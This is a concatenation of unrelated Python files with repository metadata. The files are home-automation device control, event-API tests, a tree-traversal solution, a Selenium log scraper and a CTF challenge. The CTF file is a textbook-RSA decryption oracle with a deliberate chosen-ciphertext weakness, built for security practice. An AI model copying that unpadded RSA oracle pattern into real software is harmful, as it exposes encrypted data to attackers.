if __name__ == '__main__':
calfw_root = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/data/images&landmarks/images&landmarks/images'
calfw_lmk_root = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/data/images&landmarks/images&landmarks/CA_landmarks'
target_folder = '/export/home/wangjun492/wj_armory/faceX-Zoo/face_recognition/face_evaluation/calfw/calfw_crop'
crop_calfw(calfw_root, calfw_lmk_root, target_folder)
| 44.477273 | 157 | 0.706694 |
3c015adc1dabb48fb294a3beaa89a23254967f4b
| 92 |
py
|
Python
|
tests/views/test_app.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
tests/views/test_app.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
tests/views/test_app.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
def test_index(client):
response = client.get("/")
assert b"oveda" in response.data
| 23 | 36 | 0.673913 |
55812c7fedc170dbc1d0edb8894ed741fd977bd5
| 772 |
py
|
Python
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BinaryTreeLevelOrderTraversal_iter.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: Level order in a list of lists of integers
"""
def levelOrder(self, root):
# write your code here
if root is None:
return []
res, q_lvl = [], [root]
while q_lvl != []:
pre, tmp = [], []
for node in q_lvl:
pre.append(node.val)
l, r = node.left, node.right
if l:
tmp.append(l)
if r:
tmp.append(r)
res.append(pre)
q_lvl = tmp
return res
| 22.705882 | 55 | 0.459845 |
fd227f9521e5c83f4b638aac1b6475e3dbca945c
| 12,306 |
py
|
Python
|
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | 3 |
2017-08-02T12:26:34.000Z
|
2021-01-13T01:06:26.000Z
|
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | null | null | null |
salamigalnet.py
|
MiaranaDIY/Salamigal
|
44ac98fa6463d46694e1f9343a0ebc788e7a88f8
|
[
"MIT"
] | 3 |
2017-02-14T22:10:00.000Z
|
2021-01-02T14:26:43.000Z
|
# -*- coding: utf-8 -*-
#Setup logging
import logging
import logging.config
logging.config.fileConfig('logging.conf')
# create logger
logger = logging.getLogger('root')
import multiprocessing
import threading
import time
import traceback
import subprocess as sp
import json
from devices.relay import Relay
from devices.ds18b20 import DS18B20
from devices.hcsr04 import HCSR04
from devices.l298n import L298N
#Manually create relay 1
relay_1 = Relay(17)
relay_1.name = 'Lampu Utama'
relay_1.location = 'Kamar Tamu'
relay_1.load_watt = 45
#Manually create relay 2
relay_2 = Relay(18)
relay_2.name = 'AC Samsung 1PK'
relay_2.location = 'Kamar'
relay_2.load_watt = 500
#Manually create ds18b20 1
ds18b20_1 = DS18B20('000005504c8b')
ds18b20_1.name = 'Sensor Suhu Kamar'
ds18b20_1.location = 'Kamar'
ds18b20_1.load_watt = 0.1
#Manually create hc-sr04 1
hcsr04_1 = HCSR04(23,24) #trigger, echo. don't inverse!
hcsr04_1.name = 'Sensor Tanki Air'
hcsr04_1.location = 'Tower Air'
hcsr04_1.load_watt = 0.001
hcsr04_1.tank_height = 150 #in CM
#Manually create L298N DC motor driver
l298n = L298N(25, 22, 27, 22, 27, 25)
l298n.name = 'L298N DC Motor Driver'
l298n.location = 'Casis'
l298n.load_watt = 1
class SalamigalNetworking(multiprocessing.Process):
def __init__(self, taskQ, resultQ):
super(SalamigalNetworking, self).__init__()
multiprocessing.Process.__init__(self)
self.resultQ = resultQ
self.taskQ = taskQ
self.stream_thread = []
self.streaming = 0
#Manually create device list to be send to client
def send_dev_list(self, mid, sid, uid="*"):
global relay_1
global relay_2
dev = [
{
'uid': {'label': 'UID', 'value': relay_1.uid},
'name': {'label': 'Device Name', 'value': relay_1.name},
'location': {'label': 'Location', 'value': relay_1.location},
'group': {'label': 'Group/Type', 'value':relay_1.group},
'watt': {'label': 'Load (Watt)', 'value': relay_1.load_watt},
'ontime': {'label': 'ON time (Hours)', 'value': round(relay_1.get_ontime(),2)},
'state': {'label': 'Load State', 'value': relay_1.state},
'stream': {'label': 'Streaming', 'value': relay_1.streaming},
'usage': {'label': 'Usage (Wh)', 'value': round(relay_1.get_usage(),2)}
},
{
'uid': {'label': 'UID', 'value': relay_2.uid},
'name': {'label': 'Device Name', 'value': relay_2.name},
'location': {'label': 'Location', 'value': relay_2.location},
'group': {'label': 'Group/Type', 'value':relay_2.group},
'watt': {'label': 'Load (Watt)', 'value': relay_2.load_watt},
'ontime': {'label': 'ON time (Hours)', 'value': round(relay_1.get_ontime(),2)},
'state': {'label': 'Load State', 'value': relay_2.state},
'stream': {'label': 'Streaming', 'value': relay_2.streaming},
'usage': {'label': 'Usage (Wh)', 'value': round(relay_2.get_usage(),2)}
},
{
'uid': {'label': 'UID', 'value': ds18b20_1.uid},
'name': {'label': 'Device Name', 'value': ds18b20_1.name},
'location': {'label': 'Location', 'value': ds18b20_1.location},
'group': {'label': 'Group/Type', 'value':ds18b20_1.group},
'stream': {'label': 'Streaming', 'value': ds18b20_1.streaming},
'temp': {'label': 'Temperature (C)', 'value': ds18b20_1.get_temp()}
},
{
'uid': {'label': 'UID', 'value': hcsr04_1.uid},
'name': {'label': 'Device Name', 'value': hcsr04_1.name},
'location': {'label': 'Location', 'value': hcsr04_1.location},
'group': {'label': 'Group/Type', 'value':hcsr04_1.group},
'stream': {'label': 'Streaming', 'value': hcsr04_1.streaming},
'range': {'label': 'Range (CM)', 'value': round(hcsr04_1.get_range(),2)},
'level': {'label': 'Level (%)', 'value': round(hcsr04_1.get_level(),2)}
},
{
'uid': {'label': 'UID', 'value': l298n.uid},
'name': {'label': 'Device Name', 'value': l298n.name},
'location': {'label': 'Location', 'value': l298n.location},
'group': {'label': 'Group/Type', 'value':l298n.group},
'warming': {'label': 'Waming', 'value': l298n.warming},
'direction': {'label': 'Direction', 'value': l298n.direction},
'speed': {'label': 'PWM Speed', 'value': l298n.speed}
}
]
try:
if(uid == "*"):
dev = {
'dev': dev,
'global': {
'streaming': self.streaming
}
}
self.send_message(dev,mid,to=sid)
return dev
else:
for d in dev:
if(d['uid']['value'] == uid):
dev = {
'dev': [d],
'global': {
'streaming': self.streaming
}
}
self.send_message(dev,mid,to=sid)
return dev
return None
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
#Manually create all device list and return the value or queried value
def get_dev_list(self, uid="*"):
global relay_1
global relay_2
try:
dev = [
{
'uid': relay_1.uid,
'obj': relay_1
},
{
'uid': relay_2.uid,
'obj': relay_2
},
{
'uid': ds18b20_1.uid,
'obj': ds18b20_1
},
{
'uid': hcsr04_1.uid,
'obj': hcsr04_1
},
{
'uid': l298n.uid,
'obj': l298n
}
]
if(uid == "*"):
return dev
else:
for d in dev:
if(d['uid'] == uid):
return d['obj']
return None
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
#Function for changing device property
def set_dev(self, uid, param, val, sid, mid):
try:
if(uid != '*'):
dev = self.get_dev_list(uid)
#Special relay
if(dev.group == 'Relay'):
if(param == 'state'):
dev.turn(val)
#Update device change to client
self.send_dev_list(mid, sid, uid)
elif(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special DS18B20
elif(dev.group == 'DS18B20'):
if(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special HCSR04
elif(dev.group == 'HCSR04'):
if(param == 'stream'):
if(val == 1):
self.stream_start(uid, mid, sid)
else:
self.stream_stop(uid, mid, sid)
#Special L298N
elif(dev.group == 'L298N'):
if(param == 'direction'):
if(val == 'forward'):
dev.move_forward()
elif(val == 'backward'):
dev.move_backward()
elif(val == 'turn_left'):
dev.turn_left()
elif(val == 'turn_right'):
dev.turn_right()
elif(val == 'stop'):
dev.stop()
elif(param == 'speed'):
dev.set_speed(int(val))
elif(param == 'warm_up'):
dev.warm_up(self.send_dev_list, mid, sid, uid)
self.send_dev_list(mid, sid, uid)
#Stream All Dev
elif(uid == '*' and param == 'stream'):
self.stream_start('*', mid, sid)
except Exception as err:
logging.error(err)
#Function to initialize and start device stream threading
def stream_start(self, uid, mid, sid='*'):
if(uid == '*'):
if(self.streaming):
self.streaming = 0
return None
self.streaming = 1
else:
dev = self.get_dev_list(uid)
if(dev.streaming):
dev.streaming = 0
self.send_dev_list(mid, sid, uid)
return None
dev.streaming = 1
t_stream_dev = threading.Thread(name='Device Streamer', target=self.dev_streamer, args=[uid, mid, sid])
t_stream_dev.daemon = True
t_stream_dev.start()
def stream_stop(self, uid, mid, sid='*'):
if(uid == '*'):
self.streaming = 0
else:
dev = self.get_dev_list(uid)
dev.streaming = 0
#Function to stream all or specific device data & property
def dev_streamer(self, uid, mid, sid):
if(uid == '*'):
logging.info('Streaming All Devices to {} started'.format(mid))
while self.streaming == 1:
self.send_dev_list(mid, sid, '*')
time.sleep(0.1)
logging.info('Streaming All Devices to {} stopped'.format(mid))
else:
dev = self.get_dev_list(uid)
logging.info('Streaming device {} to {} started'.format(dev.name, mid))
while dev.streaming == 1:
dev = self.get_dev_list(uid)
self.send_dev_list(mid, sid, uid)
time.sleep(0.1)
self.send_dev_list(mid, sid, uid)
logging.info('Streaming device {} to {} stopped'.format(dev.name, mid))
#Send message to client
def send_message(self, data, mid, to='*', stat='complete', is_binary=False):
rpl = {
'is_binary': is_binary,
'data' : {
'$id': mid,
'$type': stat,
'data': data
},
'to': '*'
}
self.resultQ.put(rpl)
return(rpl)
def run(self):
logging.info("** {} process started".format(self.__class__.__name__))
while True:
try:
if not self.taskQ.empty():
queue = self.taskQ.get()
print(queue)
task = queue['task']
cmd = queue['cmd']
arg = queue['arg']
sid = queue['sid']
mid = queue['mid']
#Command parsing
if(cmd == "req_dev"):
self.send_dev_list(mid, sid, arg)
elif(cmd == "set_dev"):
self.set_dev(arg['uid'], arg['param'], arg['val'], sid, mid)
time.sleep(0.01)
except Exception as err:
logging.error("%s", traceback.format_exc())
return None
logging.info("** {} process stopped".format(self.__class__.__name__))
| 37.518293 | 111 | 0.4523 |
fd35e38db468183fbc2130ace713bdead94446e5
| 1,833 |
py
|
Python
|
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
Imaginary/2021/crypto/Textbook_RSA_2_Timmy_the_Lonely_Oracle/oracle.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env -S python3 -u
from Crypto.Util.number import *
from hidden import p, q, flag1
e = 65537
n = p*q
ns = str(n)
ctxt = pow(bytes_to_long(flag1), e, n)
class SneakyUserException(Exception):
pass
def print_ctxt(t):
print("Here's the encrypted message:", t)
print("e =", e)
print("n =", ns)
def encrypt():
global e, n, ctxt
ptxt = bytes_to_long(input("What's your message to encrypt? ").encode("utf8"))
print_ctxt(pow(ptxt, e, n))
def decrypt():
global e, p, q, n, ctxt
try:
c = int(input("What's your message to decrypt? "))
if c == ctxt:
raise SneakyUserException
d = pow(e, -1, (p-1)*(q-1))
m = pow(c, d, n)
pt = long_to_bytes(m)
if pt == flag1:
raise SneakyUserException
print("The decrypted message is",m)
print()
try:
print("That spells out \""+pt.decode("utf8")+"\" if that means anything to you.")
except UnicodeDecodeError as u:
print("I couldn't figure out what that says ... are you sure you're doing it correctly?")
except SneakyUserException as e:
print("Hey, that's cheating! You can't ask me to decrypt the flag!")
print("I'm not playing with you any more! Go cheat somewhere else.")
exit()
def menu():
print()
print()
print("1: Get Encrypted Flag")
print("2: Encrypt Message")
print("3: Decrypt Message")
print("4: Quit")
print()
choice = int(input(">>> "))
if choice == 1:
print_ctxt(ctxt)
print()
print("Good luck!")
elif choice == 2:
encrypt()
elif choice == 3:
decrypt()
elif choice == 4:
print("Come back again soon!")
exit()
if __name__ == '__main__':
print("Hi! I'm Timmy! Have you come to play with my encryption system?")
print("Just let me know what I can do for you!")
while True:
try:
menu()
except Exception as ex:
print("Something's gone horribly wrong.")
print("I have to go now. Bye!")
exit()
| 24.118421 | 92 | 0.6503 |
1f82e3b3b792e561d0d5636755e371f9303a81f2
| 939 |
py
|
Python
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/data_sutram/scraper/perform__.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import json
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
options = webdriver.ChromeOptions()
#options.binary_location = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
chrome_driver_binary = "../chromedriver"
driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)
"""
caps = DesiredCapabilities.CHROME
caps['loggingPrefs'] = {'performance': 'ALL'}
driver = webdriver.Chrome(desired_capabilities=caps)
"""
driver.get('https://stackoverflow.com/questions/52633697/selenium-python-how-to-capture-network-traffics-response')
def process_browser_log_entry(entry):
response = json.loads(entry['message'])['message']
return response
browser_log = driver.get_log('performance')
events = [process_browser_log_entry(entry) for entry in browser_log]
events = [event for event in events if 'Network.response' in event['method']]
print(events)
| 40.826087 | 115 | 0.797657 |
2f09e20dc1f845d8e664b0c970c26c2fb78252be
| 24,912 |
py
|
Python
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
tests/api/test_event.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
import base64
import pytest
from project.models import PublicStatus
def test_read(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
with app.app_context():
from project.models import Event, EventStatus
from project.services.event import update_event
event = Event.query.get(event_id)
event.status = EventStatus.scheduled
update_event(event)
db.session.commit()
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_ok(url)
assert response.json["status"] == "scheduled"
def test_read_otherDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["public_status"] == "draft"
def test_read_otherUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False, admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_read_co_organizers(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id, organizer_a_id, organizer_b_id = seeder.create_event_with_co_organizers(
admin_unit_id
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["co_organizers"][0]["id"] == organizer_a_id
assert response.json["co_organizers"][1]["id"] == organizer_b_id
def test_list(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_list")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_search(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_search")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_dates(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
utils.get_ok(url)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
_, _, event_id = seeder.create_event_unverified()
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_dates_myDraft(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_dates_myUnverified(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def create_put(
place_id,
organizer_id,
name="Neuer Name",
start="2021-02-07T11:00:00.000Z",
legacy=False,
):
data = {
"name": name,
"start": start,
"place": {"id": place_id},
"organizer": {"id": organizer_id},
}
if legacy:
data["start"] = start
else:
data["date_definitions"] = [{"start": start}]
return data
@pytest.mark.parametrize(
"variant", ["normal", "legacy", "recurrence", "two_date_definitions"]
)
def test_put(client, seeder, utils, app, mocker, variant):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
utils.mock_now(mocker, 2020, 1, 1)
put = create_put(place_id, organizer_id, legacy=(variant == "legacy"))
put["rating"] = 10
put["description"] = "Neue Beschreibung"
put["external_link"] = "http://www.google.de"
put["ticket_link"] = "http://www.yahoo.de"
put["tags"] = "Freizeit, Klönen"
put["kid_friendly"] = True
put["accessible_for_free"] = True
put["age_from"] = 9
put["age_to"] = 99
put["target_group_origin"] = "tourist"
put["attendance_mode"] = "online"
put["status"] = "movedOnline"
put["previous_start_date"] = "2021-02-07T10:00:00+01:00"
put["registration_required"] = True
put["booked_up"] = True
put["expected_participants"] = 500
put["price_info"] = "Erwachsene 5€, Kinder 2€."
put["public_status"] = "draft"
if variant == "recurrence":
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=DAILY;COUNT=7"
if variant == "two_date_definitions":
put["date_definitions"].append({"start": "2021-02-07T12:00:00.000Z"})
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.dateutils import create_berlin_date
from project.models import (
Event,
EventAttendanceMode,
EventStatus,
EventTargetGroupOrigin,
)
event = Event.query.get(event_id)
assert event.name == "Neuer Name"
assert event.event_place_id == place_id
assert event.organizer_id == organizer_id
assert event.rating == put["rating"]
assert event.description == put["description"]
assert event.external_link == put["external_link"]
assert event.ticket_link == put["ticket_link"]
assert event.tags == put["tags"]
assert event.kid_friendly == put["kid_friendly"]
assert event.accessible_for_free == put["accessible_for_free"]
assert event.age_from == put["age_from"]
assert event.age_to == put["age_to"]
assert event.target_group_origin == EventTargetGroupOrigin.tourist
assert event.attendance_mode == EventAttendanceMode.online
assert event.status == EventStatus.movedOnline
assert event.previous_start_date == create_berlin_date(2021, 2, 7, 10, 0)
assert event.registration_required == put["registration_required"]
assert event.booked_up == put["booked_up"]
assert event.expected_participants == put["expected_participants"]
assert event.price_info == put["price_info"]
assert event.public_status == PublicStatus.draft
if variant == "two_date_definitions":
assert len(event.date_definitions) == 2
else:
assert len(event.date_definitions) == 1
len_dates = len(event.dates)
if variant == "recurrence":
assert (
event.date_definitions[0].recurrence_rule
== put["date_definitions"][0]["recurrence_rule"]
)
assert len_dates == 7
elif variant == "two_date_definitions":
assert len_dates == 2
else:
assert len_dates == 1
def test_put_invalidRecurrenceRule(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=SCHMAILY;COUNT=7"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingName(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["name"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingPlace(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["place"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_placeFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
place_id = seeder.upsert_default_event_place(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_missingOrganizer(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["organizer"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_id = seeder.upsert_default_event_organizer(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_co_organizers(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
organizer_a_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer A")
organizer_b_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer B")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
{"id": organizer_b_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert len(event.co_organizers) == 2
assert event.co_organizers[0].id == organizer_a_id
assert event.co_organizers[1].id == organizer_b_id
def test_put_co_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_a_id = seeder.upsert_event_organizer(other_admin_unit_id, "Organizer A")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_invalidDateFormat(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="07.02.2021T11:00:00.000Z")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-07T10:59:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_durationMoreThanMaxAllowedDuration(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-21T11:01:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_categories(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
category_id = seeder.get_event_category_id("Art")
put = create_put(place_id, organizer_id)
put["categories"] = [{"id": category_id}]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.category.name == "Art"
def test_put_dateWithTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00+01:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_dateWithoutTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
